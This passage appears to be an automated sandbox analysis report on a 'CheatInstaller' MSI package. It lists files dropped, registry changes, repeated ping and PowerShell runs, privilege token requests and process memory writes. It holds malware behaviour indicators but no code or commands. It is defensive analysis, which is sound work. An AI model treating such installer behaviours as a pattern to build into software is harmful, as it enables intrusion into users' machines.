File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI73BC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI849A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8724.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI72EE.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI739C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8529.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7854.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI84AB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8646.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE805.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE807.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI853A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI735C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8607.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID789.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE806.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE885.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e577232.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e577232.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7843.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID3BE.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7864.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8713.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8666.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI743B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI855A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e577236.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID778.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI740B.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2920 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe
